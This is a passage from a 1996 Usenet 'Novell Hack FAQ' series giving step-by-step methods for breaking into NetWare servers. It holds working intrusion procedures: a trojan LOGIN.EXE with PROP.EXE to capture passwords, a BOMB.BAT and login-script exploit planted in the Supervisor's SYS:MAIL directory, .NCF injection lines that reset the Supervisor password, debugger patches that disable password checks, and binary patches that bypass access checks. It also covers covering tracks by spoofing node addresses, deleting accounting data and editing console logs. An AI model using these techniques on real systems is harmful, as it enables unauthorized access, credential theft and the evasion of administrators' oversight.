  739.  - Now it is set. Keep PROP.EXE on a floppy, and check the server with any
  740. valid login, Supervisor or not, after a week or two.
  741.  
  742.  - To check the passwords captured, type PROP -R after your logged in. You
  743. can redirect it to a file or printer. A list of accounts and passwords,
  744. valid and working, are yours.
  745.  
  746.  - Don't forget to hide your presence! See section 05-3 for details.
  747.  
  748. ---------------------------------------------------------------------------
  749.  
  750. 02-3. What is a "brute force" password cracker?
  751.  
  752. If Intruder Detection is off, you can just guess the password until you get
  753. it. This can be automated by using a program that continually guesses 
  754. passwords, known as a "brute force" password cracker. One program that does 
  755. this is NOVELBFH.EXE (for version 3.x only). This program will try passwords
  756. like aa, ab, ac and so on until every legal character combination has been 
  757. tried. You will eventually get the password. However this assumes you have 
  758. 1) a lot of time since it takes a second or two for each try (more on a 
  759. dial-up link), and 2) access to a machine that will run one of these programs 
  760. for hours, even days. And if Intruder Detection is on you will be beeping the 
  761. System Console every couple of seconds and time-stamping your node address to 
  762. the File Server Error Log.
  763.  
  764. ---------------------------------------------------------------------------
  765.  
  766. 02-4. What is a "dictionary" password cracker?
  767.  
  768. For a password cracker that works against a single account and uses a 
  769. dictionary wordlist, try NWPCRACK.EXE by Teiwaz. You must supply a dictionary
  770. wordlist (see the alt.2600/#hack FAQ for FTP sites with wordlists), and you 
  771. are subject to the same limitations as NOVELBFH (no Intruder Detection, 3.x 
  772. only) but it works great.
  773.  
  774. For a password cracker that works directly against either the .OLD bindery
  775. files left over after a BINDFIX or even a live bindery, look for BINDERY.ZIP.
  776. This ZIP contains BINDERY.EXE which will, among other things, extract user
  777. information out of bindery files into a Unix-style password text file. Then
  778. you can use BINCRACK.EXE from the same ZIP to "crack" the extracted text
  779. file. BINCRACK.EXE, like NWPCRACK.EXE, requires a word list. BINCRACK.EXE is
  780. extremely fast.
  781.  
  782. One interesting thing, the BINDERY.ZIP file also contains versions of
  783. BINCRACK for Solaris 1 and Solaris 2, so you can copy that extracted user
  784. info to a Sparc and do lightning-quick cracks.
  785.  
  786. For checking existing passwords for guessability, see section 07-9.
  787.  
  788. ---------------------------------------------------------------------------
  789.  
  790. 02-5. How do I use SETPWD.NLM?
  791.  
  792. You can load SETPWD at the console or via RCONSOLE. If you use RCONSOLE, use
  793. the Transfer Files To Server option and put the file in SYS:SYSTEM.
  794.  
  795. For 3.x:
  796. LOAD [path if not in SYS:SYSTEM]SETPWD [username] [newpassword]
  797.  
  798. For 4.x:
  799. set bindery context = [context, e.g. hack.corp.us]
  800. LOAD [path if not in SYS:SYSTEM]SETPWD [username] [newpassword]
  801.  
  802. In 4.x the change is replicated so you have access to all the other servers
  803. in the tree. And don't forget, you must follow the password requirements in
  804. SYSCON for this to work. That is, if the account you are changing normally
  805. requires a 6 character password, then you'll need to supply a 6 character
  806. password.
  807.  
  808. ---------------------------------------------------------------------------
  809.  
  810. 02-6. What's the "debug" way to disable passwords?
  811.  
  812. You must be at the console to do this:
  813.  
  814. <left-shift><right-shift><alt><esc>          Enters Debugger
  815. type "d VerifyPassword 6"    Write down 6 byte response for later use
  816. type "c Verifypassword=B8 0 0 0 0 C3"    Sets system to turn off pword checks
  817. type "g"    To make the system change and drop you back into the console
  818.  
  819. to turn password checking back on...
  820.  
  821. <left-shift><right-shift><alt><esc>          Enters Debugger
  822. type "c VerifyPassword= xx xx xx xx xx xx"   Where xx's are the previous 
  823. recorded numbers that where written down.
  824. type "g"   To make system changes and drop you back to into the console
  825.  
  826. Teiwaz updated these steps to make things easier and workable.
  827.  
  828. ---------------------------------------------------------------------------
  829.  
  830. 02-7. Exactly how do passwords get encrypted?
  831.  
  832. The algorithm for 3.x and 4.x is, according to some sources, the same. It is 
  833. a proprietary algorithm that is supposed to be one-way.
  834.  
  835. The following is a description of the source code located at the 
  836. dutiws.twi.tudelft.nl site in the /pub/novell directory. The code was posted
  837. by Fauzan Mirza on sci.crypt for discussion, and produced the following
  838. bit-by-bit description in comp.os.netware.security by David Wagner (I've
  839. removed most of the flame comments):
  840.  
  841. encryptp(int id[4], char password[])
  842.     char    buffer[32];
  843.  
  844.     concatenate password[] to itself until its at least 32 bytes long
  845.     put the result in buffer[]
  846.     concatenate id[] to itself until its at least 32 bytes long
  847.     xor the result into buffer[]
  848.  
  849.     return encrypt(buffer[])
  850.  
  851. encrypt(char buf[32])
  852.     nibble  output[32];     /* a nibble = 4 bits = half a byte */
  853.  
  854.     apply some complicated (but easily reversible!) function to buf[]
  855.     for (i=0; i<32; i++)
  856.         output[i] = S-box[buf[i]];
  857.     return output[] /* a 16 byte return value */
  858.  
  859. where the S-box[] crunches 8 bit values down to 4 bit values.
  860.  
  861. So here's how to invert the password hash function, given the 16 byte
  862. hash output[] value:
  863.  
  864.     for (i=0; i<32; i++)
  865.         pick any x such that S-box[x] == output[i] /* this is easy */
  866.         buf[i] = x
  867.     apply the reverse of the complicated function to buf[]
  868.     
  869.     concatenate id[] to itself..., and xor the result into buf[]
  870.  
  871.     use the resulting 32 byte buf[] as the inverse password
  872.  
  873. Of course, there are several nitpicking details which I've left out:
  874. if you're actually writing the inversion program, you have to make sure
  875. to take care of the details, but they only make the programming more
  876. complicated, they don't make the inversion process any slower once the
  877. program is written.
  878.  
  879. Also, there is the fact that the inverse password will include full
  880. 8-bit values, not just ASCII alphanumerics.  Once could try to be a
  881. bit more sophisticated to ensure you get an inverse which is alphanumeric.
  882. I haven't bothered to think about this case too much -- it doesn't
  883. seem to be worth the neurotransmitters.
  884.  
  885. The reason you don't get the "true" "original" password is because
  886. when you pick 'x' above, you can't know which 'x' was the "true"
  887. "original" value, since the S-boxes throw away information.
  888.  
  889. ---------------------------------------------------------------------------
  890.  
  891.  
  892. - Simple Nomad - Data Wanderer, Knowledge Hunter/Gatherer
  893. -    E-Mail    - thegnome@fastlane.net - thegnome@spyder.org
  894. -              - thegnome@onyx.infonexus.com
  895. -      URL     - http://www.fastlane.net/homepages/thegnome
  896. -    Secrets   - Get "new" PGP key via my home page
  897.  
  898. From netcom.com!ix.netcom.com!howland.reston.ans.net!vixen.cso.uiuc.edu!newsfeed.internetmci.com!in2.uu.net!news.nkn.net!news Fri Mar  8 08:39:29 1996
  899. Xref: netcom.com alt.2600:178179 comp.os.netware.security:3204 comp.security.misc:27780
  900. Path: netcom.com!ix.netcom.com!howland.reston.ans.net!vixen.cso.uiuc.edu!newsfeed.internetmci.com!in2.uu.net!news.nkn.net!news
  901. From: thegnome@fastlane.net (Simple Nomad)
  902. Newsgroups: alt.2600,comp.os.netware.security,comp.security.misc
  903. Subject: Novell Hack FAQ -- Part 5 of 12
  904. Date: 8 Mar 1996 04:41:16 GMT
  905. Organization: Nomad Mobile Research Centre
  906. Lines: 153
  907. Message-ID: <4hodpc$ih0@news2.nkn.net>
  908. NNTP-Posting-Host: fw47.fastlane.net
  909. X-Newsreader: WinVN 0.92.6+
  910.  
  911. ---------------------------------------------------------------------------
  912.  
  913. Section 03
  914.  
  915. Accounting and Account Security
  916.  
  917. ---------------------------------------------------------------------------
  918.  
  919. 03-1. What is Accounting?
  920.  
  921. Accounting is Novell's pain in the butt way to control and manage access to
  922. the server in a way that is "accountable". The admin set up charge rates for
  923. blocks read and written, service requests, connect time, and disk storage.
  924. The account "pays" for the service by being given some number, and the
  925. accounting server deduces for these items. How the account actually pays
  926. for these items (departmental billing, cash, whatever) you may or may not
  927. want to know about, but the fact that it could be installed could leave a
  928. footprint that you've been there.
  929.  
  930. Any valid account, including non-supe accounts, can check to see if 
  931. Accounting is turned on. Simply run SYSCON and try to access Accounting,
  932. if you get a message that Accounting is not installed, then guess what?
  933.  
  934. Since it is a pain to administer, many sys admins will turn it on simply
  935. to time-stamp each login and logout, track intruders, and include the
  936. node address and account name of each of these items.
  937.  
  938. ---------------------------------------------------------------------------
  939.  
  940. 03-2. How do I defeat Accounting?
  941.  
  942. Turn it off. And spoof your node address. Here's the steps -
  943.  
  944.  - Spoof your address (see 03-6). Use a supe account's typical node
  945. address as your own.
  946.  
  947.  - If you are using a backdoor, activate it with SUPER.EXE.
  948.  
  949.  - Delete Accounting by running SYSCON, selecting Accounting, Accounting
  950. Servers, hitting the delete key, and answering yes when asked if you
  951. wish to delete accounting. The last entry in the NET$ACCT.DAT file will
  952. be your login time-stamped with the spoofed node address.
  953.  
  954.  - Now do what you will in the system. Use a different account if you
  955. like, it won't show up in the log file.
  956.  
  957.  - When done, login with the original account, run SYSCON and
  958. re-install Accounting. Immediately logout, and the next line in the
  959. NET$ACCT.DAT file will be your logout, showing a login and logout
  960. with the same account name, nice and neat.
  961.  
  962. If you can't spoof the address (some LAN cards don't allow it or require
  963. extra drivers you may not have), just turn off Accounting and leave it
  964. off or delete the NET$ACCT.DAT file located in the SYS:SYSTEM
  965. directory.
  966.  
  967. It should be noted that to turn off and on Accounting you need supe
  968. equivalent, but you don't need supe equivalence to spoof the address.
  969.  
  970. ---------------------------------------------------------------------------
  971.  
  972. 03-3. What is Intruder Detection?
  973.  
  974. Intruder Detection is Novell's way of tracking invalid password attempts. While 
  975. this feature is turned off by default, most sites practicing any type of security 
  976. will at minimum turn this feature on. There are several parameters to Intruder 
  977. Detection. First, there is a setting for how long the server will remember a bad 
  978. password attempt. Typically this is set to 30 minutes, but can be as short as 10 
  979. minutes of as long as 7 days. Then there is a setting for how many attempts will 
  980. lockout the account. This is usually 3 attempts, but can be as short as 1 or as 
  981. many as 7. Finally is the length the account is locked out. The default is 30 
  982. minutes but it can range from 10 minutes to 7 days.
  983.  
  984. When an Intruder Detection occurs, the server beeps and a time-stamped message is 
  985. displayed on the System Console with the account name that is now locked out and 
  986. the node address from where to attempt came from. This is also written to the 
  987. File Server Error Log. A Supervisor or equivalent can unlock the account before 
  988. it frees itself up, and the File Server Error Log can also be erased by a 
  989. Supervisor or equivalent.
  990.  
  991. In a large shop, it is not unusual to see Intruder Lockouts even on a daily 
  992. basis, and forgetting a password is a typical regular-user thing to do. Intruder 
  993. Lockouts on Supervisor or equivalent account is usually noticed. 
  994.  
  995. ---------------------------------------------------------------------------
  996.  
  997. 03-4. How do I check for Intruder Detection?
  998.  
  999. The easiest way to check for Intruder Detection is to play with a valid
  1000. account that you know the password of. Try the wrong password several times.
  1001. If Intruder Detection is on, the account will be locked out once you try to
  1002. get back in with the correct password.
  1003.  
  1004. ---------------------------------------------------------------------------
  1005.  
  1006. 03-5. What are station/time restrictions?
  1007.  
  1008. Time restrictions can be placed on an account to limit the times in which
  1009. an account can be logged in. In the account is already logged in and the
  1010. time changes to a restricted time, the account is logged out. The 
  1011. restriction can be per weekday down to the half hour. That means that if
  1012. an admin wants to restrict an account from logging in except on Monday
  1013. through Friday from 8-5, it can be done. Only Supervisor and equivalents
  1014. can alter time restrictions. Altering the time at the workstation will
  1015. not get you around time restrictions, only altering time at the server
  1016. can change the ability to access.
  1017.  
  1018. Station restriction place a restriction on _where_ an account can be used.
  1019. Restrictions can be to a specific token ring or ethernet segment, and can
  1020. be specific down to the MAC layer address, or node address. The only way
  1021. around a station restriction at the node address is to spoof the address
  1022. from a workstation on the same segment or ring as the address you are
  1023. spoofing. Like time restrictions, only Supervisor and equivalents
  1024. can alter station restrictions.
  1025.  
  1026. Of course you can remove station and time restrictions in SYSCON if you are
  1027. a Supe equivalent.
  1028.  
  1029. ---------------------------------------------------------------------------
  1030.  
  1031. 03-6. How do I spoof my node or IP address?
  1032.  
  1033. This will depend greatly on what kind of network interface card (NIC) the
  1034. workstation has, as to whether you can perform this function. Typically you
  1035. can do it in the Link Driver section of the NET.CFG file by adding the
  1036. following line - NODE ADDRESS xxxxxxxxxxxx where xxxxxxxxxxxx is the 12
  1037. digit MAC layer address. This assumes you are using Netware's ODI drivers,
  1038. if you are using NDIS drivers you will have to add the line to a
  1039. PROTOCOL.INI or IBMENII.NIF file, which usually has the lines already in it.
  1040.  
  1041. For an IP address, you may have to run a TCPIP config program to make it
  1042. work (it depends on whose IP stack you are running). Some implementations
  1043. will have the mask, the default router and the IP address in the NET.CFG,
  1044. some in the TCPIP.CFG. It is a good idea to look around in all network-
  1045. related subdirectories to see if there are any .CFG, .INI, or .NIF files
  1046. that may contain addresses.
  1047.  
  1048. Getting the target node address should be pretty easy. Login with any
  1049. account and do a USERLIST /A. This will list all accounts currently logged
  1050. in with their network and node address. If your workstation is on the same
  1051. network as the target, you can spoof the address no problem. Actually you
  1052. can spoof the address regardless but to defeat station restrictions you
  1053. must be on the same network.
  1054.  
  1055. ---------------------------------------------------------------------------
  1056.  
  1057.  
  1058.  
  1059. - Simple Nomad - Data Wanderer, Knowledge Hunter/Gatherer
  1060. -    E-Mail    - thegnome@fastlane.net - thegnome@spyder.org
  1061. -              - thegnome@onyx.infonexus.com
  1062. -      URL     - http://www.fastlane.net/homepages/thegnome
  1063. -    Secrets   - Get "new" PGP key via my home page
  1064.  
  1065. From netcom.com!ix.netcom.com!howland.reston.ans.net!nntp.coast.net!zombie.ncsc.mil!news.mathworks.com!newsfeed.internetmci.com!in2.uu.net!news.nkn.net!news Fri Mar  8 08:39:29 1996
  1066. Xref: netcom.com alt.2600:178181 comp.os.netware.security:3205 comp.security.misc:27781
  1067. Path: netcom.com!ix.netcom.com!howland.reston.ans.net!nntp.coast.net!zombie.ncsc.mil!news.mathworks.com!newsfeed.internetmci.com!in2.uu.net!news.nkn.net!news
  1068. From: thegnome@fastlane.net (Simple Nomad)
  1069. Newsgroups: alt.2600,comp.os.netware.security,comp.security.misc
  1070. Subject: Novell Hack FAQ -- Part 6 of 12
  1071. Date: 8 Mar 1996 04:42:02 GMT
  1072. Organization: Nomad Mobile Research Centre
  1073. Lines: 99
  1074. Message-ID: <4hodqq$ih0@news2.nkn.net>
  1075. NNTP-Posting-Host: fw47.fastlane.net
  1076. X-Newsreader: WinVN 0.92.6+
  1077.  
  1078. ---------------------------------------------------------------------------
  1079.  
  1080. Section 04
  1081.  
  1082. The Console
  1083.  
  1084. ---------------------------------------------------------------------------
  1085.  
  1086. 04-1. How do I defeat console logging?
  1087.  
  1088. Here you need console and Supervisor access. The site is running 3.11 or
  1089. higher and running the CONLOG.NLM. Any site running this is trapping all
  1090. console messages to a file. If you run SETPWD at the console, the response
  1091. by SETPWD is written to a log file. Here's the steps for determining if it
  1092. is running and what to do to defeat it:
  1093.  
  1094.  - Type MODULES at the console. Look for the CONLOG.NLM. If it's there, it's
  1095. running.
  1096.  
  1097.  - Look on the server in SYS:ETC for a file called CONSOLE.LOG. This is a
  1098. plain text file that you can type out. However you cannot delete or edit it
  1099. while CONLOG is running.
  1100.  
  1101.  - Unload CONLOG at the console.
  1102.  
  1103.  - Delete, or even better yet, edit the CONSOLE.LOG file, erasing your tracks.
  1104.  
  1105.  - Reload CONLOG. It will show that is has been restarted in the log.
  1106.  
  1107.  - Check the CONSOLE.LOG file to ensure the owner has not changed.
  1108.  
  1109.  - Run PURGE in the SYS:ETC directory to purge old versions of CONSOLE.LOG
  1110. that your editor have left to be salvaged.
  1111.  
  1112. ---------------------------------------------------------------------------
  1113.  
  1114. 04-2. Can I set the RCONSOLE password to work for just Supervisor?
  1115.  
  1116. Yes and no. In version 3.x, the Supe password always works.
  1117.  
  1118. A common mistake regarding 3.x RCONSOLE passwords is to use a switch to use
  1119. only the Supervisor password. It works like this:
  1120.  
  1121. LOAD REMOTE /P=
  1122.  
  1123. instead of 
  1124.  
  1125. LOAD REMOTE RCONPASSWORD
  1126.  
  1127. The admin believes /P= turns off everything except the Supe password for
  1128. RCONSOLE. In fact the password is just set to /P= which will get you in!
  1129. The second most common mistake is using -S.
  1130.  
  1131. Version 4.1 is a bit different. Here's how it works:
  1132.  
  1133. - At the console prompt, type LOAD REMOTE SECRET where SECRET is the
  1134. Remote Console password.
  1135.  
  1136. - Now type REMOTE ENCRYPT. You will be prompted for a password to encrypt.
  1137.  
  1138. - This will give you the encrypted version of the password, and give you the 
  1139. option of writing LDREMOTE.NCF to the SYS:SYSTEM directory, containing all 
  1140. the entries for loading Remote Console support.
  1141.  
  1142. - You can call LDREMOTE from your AUTOEXEC.NCF, or you can change the
  1143. LOAD REMOTE line in the AUTOEXEC.NCF as follows:
  1144.  
  1145. LOAD REMOTE SECRET
  1146.  
  1147. becomes
  1148.  
  1149. LOAD REMOTE -E 870B7E366363
  1150.  
  1151. ---------------------------------------------------------------------------
  1152.  
  1153. 04-3. How can I get around a locked MONITOR?
  1154.  
  1155. There is a simple and easy way to do this in 3.11 if you have a print server 
  1156. running on the file server. The following exploits a bug in 3.11:
  1157.  
  1158. - Use pconsole to down the print server. This causes the monitor screen to go
  1159. to the print server screen and wait for you to press enter to exit the 
  1160. screen. At the same time it puts the monitor screen in the background. 
  1161.  
  1162. - Switch to the console screen and type UNLOAD MONITOR.
  1163.  
  1164. - Check the AUTOEXEC.NCF for the PSERVER.NLM load line and manually reload
  1165. the PSERVER.NLM.
  1166.  
  1167. ---------------------------------------------------------------------------
  1168.  
  1169.  
  1170.  
  1171.  
  1172. - Simple Nomad - Data Wanderer, Knowledge Hunter/Gatherer
  1173. -    E-Mail    - thegnome@fastlane.net - thegnome@spyder.org
  1174. -              - thegnome@onyx.infonexus.com
  1175. -      URL     - http://www.fastlane.net/homepages/thegnome
  1176. -    Secrets   - Get "new" PGP key via my home page
  1177.  
  1178. From netcom.com!ix.netcom.com!howland.reston.ans.net!vixen.cso.uiuc.edu!newsfeed.internetmci.com!in2.uu.net!news.nkn.net!news Fri Mar  8 08:39:29 1996
  1179. Xref: netcom.com alt.2600:178182 comp.os.netware.security:3206 comp.security.misc:27782
  1180. Path: netcom.com!ix.netcom.com!howland.reston.ans.net!vixen.cso.uiuc.edu!newsfeed.internetmci.com!in2.uu.net!news.nkn.net!news
  1181. From: thegnome@fastlane.net (Simple Nomad)
  1182. Newsgroups: alt.2600,comp.os.netware.security,comp.security.misc
  1183. Subject: Novell Hack FAQ -- Part 7 of 12
  1184. Date: 8 Mar 1996 04:44:27 GMT
  1185. Organization: Nomad Mobile Research Centre
  1186. Lines: 281
  1187. Message-ID: <4hodvb$ih0@news2.nkn.net>
  1188. NNTP-Posting-Host: fw47.fastlane.net
  1189. X-Newsreader: WinVN 0.92.6+
  1190.  
  1191. ---------------------------------------------------------------------------
  1192.  
  1193. Section 05
  1194.  
  1195. File and Directory Access
  1196.  
  1197. ---------------------------------------------------------------------------
  1198.  
  1199. 05-1. How can I see hidden files and directories?
  1200.  
  1201. Instead of a normal DIR command, use NDIR to see hidden files and
  1202. directories. NDIR *.* /S /H will show you just Hidden and System files.
  1203.  
  1204. ---------------------------------------------------------------------------
  1205.  
  1206. 05-2. How do I defeat the execute-only flag?
  1207.  
  1208. If a file is flagged as execute-only, it can still be opened. Open the file
  1209. with a program that will read in executables, and do a Save As to another
  1210. location.
  1211.  
  1212. Also try X-AWAY.EXE to remove this flag since Novell's FLAG.EXE won't. But
  1213. once again X-AWAY.EXE requires Supervisor access.
  1214.  
  1215. To disable the check for Supe access in X-AWAY, try the following:
  1216.  
  1217.         REN X-AWAY.EXE WORK
  1218.         DEBUG WORK
  1219.         EB84 EB
  1220.         W
  1221.         Q
  1222.         REN WORK X-AWAY.EXE
  1223.  
  1224. Hey presto, anybody can copy X flagged files. The only catch is you need 
  1225. practically full rights in the directory where the X flagged file resides.
  1226.  
  1227. ---------------------------------------------------------------------------
  1228.  
  1229. 05-3. How can I hide my presence after altering files?
  1230.  
  1231. The best way is to use Filer. Here are the steps for removing file
  1232. alterations -
  1233.  
  1234.  - Run Filer or use NDIR and note the attributes of the target file, namely
  1235. the date and owner of the file.
  1236.  
  1237.  - Make your changes or access the file.
  1238.  
  1239.  - Run Filer or use NDIR and check to see if the attributes have changed. If
  1240. so, change them back to the original settings.
  1241.  
  1242. While you can hit F1 will in Filer and get all the context-sensitive help
  1243. you need, the quicky way to get where you're going is to run Filer in the
  1244. target file's directory, select Directory Contents, highlight the target
  1245. file and hit enter, select File Options and then View/Set File Information.
  1246. View and edit to your heart's desire.
  1247.  
  1248. ---------------------------------------------------------------------------
  1249.  
  1250. 05-4. What is a Netware-aware trojan?
  1251.  
  1252. A Netware-aware trojan is a program that supposedly does one thing but does
  1253. another instead, and does it using Netware API calls. I have never personally
  1254. encountered one, but here is how they would work.
  1255.  
  1256.  - Trojan program is placed on a workstation, hopefully on one frequented
  1257. by admins with Supe rights. The trojan program could be named something like
  1258. CHKVOL.COM or VOLINFO.COM, that is a real name but with a .COM extension.
  1259. They would be placed in the workstation's path.
  1260.  
  1261.  - Once executed, the trojan uses API calls to determine if the person is
  1262. logged in as a Supe equivalent, if not it goes to the next step. Otherwise
  1263. some type of action to breach security is performed.
  1264.  
  1265.  - The real CHKVOL.EXE or VOLINFO.EXE is ran.
  1266.  
  1267. The breach of security would typically be some type of command-line activity
  1268. that could be performed by system() calls. For example, PROP.EXE could be
  1269. run to build a property and the replacement LOGIN.EXE copied up to the
  1270. server in the SYS:LOGIN directory. Or RW access granted to the SYS:SYSTEM
  1271. directory for a non-Supe user like GUEST.
  1272.  
  1273. Once activated the trojan could also erase itself since it is no longer
  1274. needed.
  1275.  
  1276. ---------------------------------------------------------------------------
  1277.  
  1278. 05-5. What are Trustee Directory Assignments?
  1279.  
  1280. The LAN God has pointed out quite correctly that Trustee Directory Assignments
  1281. are the most misunderstood and misconfigured portion of Novell Netware. Typically
  1282. a secure site should have Read and File Scan only in most directories, and
  1283. should not have any rights on the root directory of any volume. Rights assigned
  1284. via the Trustee Directory Assignments filter down the directory tree, so if a
  1285. user has Write access at the root directory, that user has Write access in every 
  1286. subdirectory below it (unless explicitly limited in a subdirectory down stream).
  1287. And these assignments are not located in the bindery, but on each volume.
  1288.  
  1289. The following is a brief description of Trustees and Trustee Directory
  1290. Assignments cut and pasted from the comp.os.netware.security FAQ:
  1291.  
  1292. [quote]
  1293. A trustee is any user or group that has been granted access rights in a 
  1294. directory.
  1295.  
  1296. The access rights in Novell NetWare 2 are slightly different from the ones in
  1297. NetWare 3.
  1298.  
  1299. The following is a summary of access rights for NetWare 3.
  1300.  
  1301. S - Supervisory. Any user with supervisory rights in a directory will
  1302. automatically inherit all other rights, regardless of whether they have been 
  1303. explicitly granted or not. Supervisor equivalent accounts will hold this access 
  1304. right in every directory.
  1305.  
  1306. R - Read. Enables users to read files.
  1307.  
  1308. C - Create. Enables users to create files and directories. Unless they also have 
  1309. write access, they will not be able to edit files which have been created.
  1310.  
  1311. W - Write. Enables users to make changes to files. Unless they also have create 
  1312. access, they may not be able to edit files, since the write operation can only be 
  1313. used to extend files (not truncate them, which file editors need to do).
  1314.  
  1315. E - Erase. Enable users to erase files and remove directories.
  1316.  
  1317. M - Modify. Enable users to modify file attributes.
  1318.  
  1319. F - File scan. Enables users to see file and directory information. If a user 
  1320. does not have file scan rights, they will not see any evidence of such files 
  1321. existing.
  1322.  
  1323. A - Access control. Enable user to change trustee rights. They will be able to 
  1324. add other users as trustees, remove trustees, and grant/revoke specific rights 
  1325. from users. The only caveat of access control is that it is possible for users to 
  1326. remove themselves (as trustees) from directories, thus losing all access control.
  1327.  
  1328. In addition to trustees and access rights, there is a concept of inherited rights 
  1329. which means that users inherit rights from parent directories. For example, if 
  1330. user ALICE has rights [CWEM] in a directory, and she has [RF] rights in the 
  1331. parent directory then she will have [RCWEMF] rights as a result of the inherited 
  1332. rights. This will only work if one of the rights that ALICE has in the two 
  1333. directories is granted to a group; if both are granted to her, she will lose the 
  1334. rights of the parent.
  1335. [end quote]
  1336.  
  1337. ---------------------------------------------------------------------------
  1338.  
  1339. 05-6. Are there any default Trustee Assignments that can be exploited?
  1340.  
  1341. Yes. In 3.x the group EVERYONE has Create rights in SYS:MAIL. This means 
  1342. the user (including GUEST) has the ability to write files to any
  1343. subdirectory in SYS:MAIL. The first versions of Netware included a simple
  1344. e-mail package, and every user that is created gets a subdirectory in
  1345. mail with RCWEMF, named after their object ID number. One consistent 
  1346. number is the number 1, which is always assigned to Supervisor. Here's
  1347. one way to exploit it:
  1348.  
  1349. - Login as GUEST and change to the SYS:MAIL subdirectory.
  1350.  
  1351. - Type DIR. You will see one subdirectory, the one owned by GUEST. Change
  1352. into that directory (ex. here is C0003043)
  1353.  
  1354. - Type DIR. If there is no file named LOGIN, you can bet there may not be
  1355. one for Supervisor. If there is a default-looking LOGIN file, even a zero 
  1356. length file, you cannot proceed.
  1357.  
  1358. - Copy PROP.EXE and LOGIN.EXE (the itsme version) to SYS:MAIL\C0003043
  1359.  
  1360. - Create a batch file (ex. here is BOMB.BAT) with the following entries:
  1361.  
  1362.   @ECHO OFF
  1363.   FLAG \LOGIN\LOGIN.EXE N > NUL
  1364.   COPY \MAIL\C0003043\LOGIN.EXE \LOGIN\LOGIN.EXE > NUL
  1365.   FLAG \LOGIN\LOGIN.EXE SRO > NUL
  1366.   \MAIL\C0003043\PROP -C > NUL
  1367.  
  1368. - Create a LOGIN file with the following entries:
  1369.  
  1370.   MAP DISPLAY OFF
  1371.   MAP ERRORS OFF
  1372.   MAP G:=SYS:
  1373.   DRIVE G:
  1374.   COMMAND /C #\MAIL\1\BOMB
  1375.   DRIVE F:
  1376.   MAP DELETE G:
  1377.  
  1378. - Now copy the files to the Supervisor's SYS:MAIL directory from a drive
  1379. mapped to the SYS: volume.
  1380.  
  1381. TYPE BOMB.BAT > \MAIL\1\BOMB.BAT
  1382. TYPE LOGIN > \MAIL\1\LOGIN
  1383.  
  1384. - The next time the Supervisor logs in the LOGIN.EXE is replaced and the
  1385. PROP.EXE file is run, capturing passwords. Run PROP.EXE later to get the
  1386. passwords, and then once you have all the passwords you need (including
  1387. Supervisor) delete your LOGIN and BOMB.BAT file. 
  1388.  
  1389. Admins can defeat this by creating default personal Login Scripts or by
  1390. adding an EXIT command to the end of the System Login Script. Later versions
  1391. of Netware create a zero-length LOGIN file at ID creation time in the 
  1392. SYS:MAIL directories to defeat this.
  1393.  
  1394. ---------------------------------------------------------------------------
  1395.  
  1396. 05-7. What are some general ways to exploit Trustee Rights?
  1397.  
  1398. To find out all your trustee rights, use the WHOAMI /R command. The 
  1399. following section is a summary of what rights to expect, and the purpose.
  1400. Where x appears, it means it doesn't matter if the right is set.
  1401.  
  1402. [SRWCEMFA] means you have FULL rights. They are all eight of the effective
  1403.         rights flags.
  1404.  
  1405. [Sxxxxxxx] shouldn't appear unless you are supervisor (or equivalent).
  1406.         It means you have full access in that directory and all subdirectories.
  1407.         You cannot be excluded from any directory, even if a user explicitly
  1408.         tries to revoke your access in a subdirectory.
  1409.  
  1410. [xxxxxxxA] is next best thing to the S right. It means you have access
  1411.         control in that directory and all subdirectories. You can have your
  1412.         access control (along with any other rights) revoked in a subdirectory,
  1413.         but you can always use inherited rights to recover them (see the 
  1414.         c.o.n.s FAQ).
  1415.  
  1416. [ R    F ] is what users should have in directories containing software.
  1417.         You have the right to read files only.
  1418.  
  1419. [ RCWEMFx] is what users should have in their home directory. You can read,
  1420.         create, and edit files. If you find any unusual directories with 
  1421.         these rights, they can also be used for storing files (maybe an abuse 
  1422.         of the network, especially if this is exploited to avoid quota 
  1423.         systems).
  1424.  
  1425. [ RxW  F ] usually means that the directory is used for keeping log files.
  1426.         Unless you have the C right, it may not be possible to edit files in
  1427.         this directory.
  1428.  
  1429. The RIGHTS commands tells you what rights you have in a particular directory.
  1430. GRANT, REVOKE, and REMOVE are used to set trustee rights.
  1431.  
  1432. ---------------------------------------------------------------------------
  1433.  
  1434. 05-8. Can access to .NCF files help me?
  1435.  
  1436. Access to any .NCF file can bypass security, as these files are traditionally
  1437. run from the console and assume the security access of the console. The
  1438. addition of a few lines to any .NCF file can get you access to that system.
  1439.  
  1440. The most vulnerable file would be the AUTOEXEC.NCF file. Adding a couple of
  1441. lines to run BURGLAR.NLM or SETPWD.NLM would certainly get you access. But
  1442. remember there are other .NCF files that can be used and exploited. For
  1443. example, ASTART.NCF and ASTOP.NCF are used to start and stop Arcserve, the
  1444. most popular backup system for Netware. The LDREMOTE.NCF as mentioned in
  1445. section 04-2 is another potential target.
  1446.  
  1447. The lines you might add to such a file might be as follows:
  1448.  
  1449. UNLOAD CONLOG
  1450. LOAD SETPWD SUPERVISOR SECRET
  1451. CLS
  1452. LOAD CONLOG
  1453.  
  1454. This assumes you had read/write access to the location of the .NCF file
  1455. and can copy SETPWD.NLM to the server. Note that by unloading CONLOG you 
  1456. are only partially covering your tracks, in the CONSOLE.LOG file it will
  1457. be obvious that CONLOG was unloaded and reloaded. The CLS is to keep your
  1458. activities off of the server's screen.
  1459.  
  1460. The best .NCF for this is obviously one that is either used during the
  1461. server's boot process or during some automated process. This way a short
  1462. .NCF and its activities may escape the eyes of an admin during execution.
  1463.  
  1464. ---------------------------------------------------------------------------
  1465.  
  1466.  
  1467. - Simple Nomad - Data Wanderer, Knowledge Hunter/Gatherer
  1468. -    E-Mail    - thegnome@fastlane.net - thegnome@spyder.org
  1469. -              - thegnome@onyx.infonexus.com
  1470. -      URL     - http://www.fastlane.net/homepages/thegnome
  1471. -    Secrets   - Get "new" PGP key via my home page
  1472.  
  1473. From netcom.com!ix.netcom.com!howland.reston.ans.net!vixen.cso.uiuc.edu!newsfeed.internetmci.com!in2.uu.net!news.nkn.net!news Fri Mar  8 08:39:29 1996
  1474. Xref: netcom.com alt.2600:178183 comp.os.netware.security:3207 comp.security.misc:27783
  1475. Path: netcom.com!ix.netcom.com!howland.reston.ans.net!vixen.cso.uiuc.edu!newsfeed.internetmci.com!in2.uu.net!news.nkn.net!news
  1476. From: thegnome@fastlane.net (Simple Nomad)
  1477. Newsgroups: alt.2600,comp.os.netware.security,comp.security.misc
  1478. Subject: Novell Hack FAQ -- Part 8 of 12
  1479. Date: 8 Mar 1996 04:47:43 GMT
  1480. Organization: Nomad Mobile Research Centre
  1481. Lines: 264
  1482. Message-ID: <4hoe5f$ih0@news2.nkn.net>
